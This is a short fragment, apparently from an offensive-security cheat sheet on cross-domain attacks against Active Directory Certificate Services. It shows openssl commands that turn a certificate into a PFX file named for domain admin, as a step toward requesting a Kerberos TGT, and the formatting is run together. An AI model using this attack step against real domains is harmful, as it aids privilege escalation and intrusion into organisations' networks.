🟢AD CS
Cross Domain Attacks in Active Directory Certificate Services (AD CS)
Sign up to our mailing list to receive updates!
Change the RSA into a PFX
# linux
# openssl and provide a password
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx# windows
# openssl and provide a password
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem - keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx4. Request a TGT with the pfx
Last updated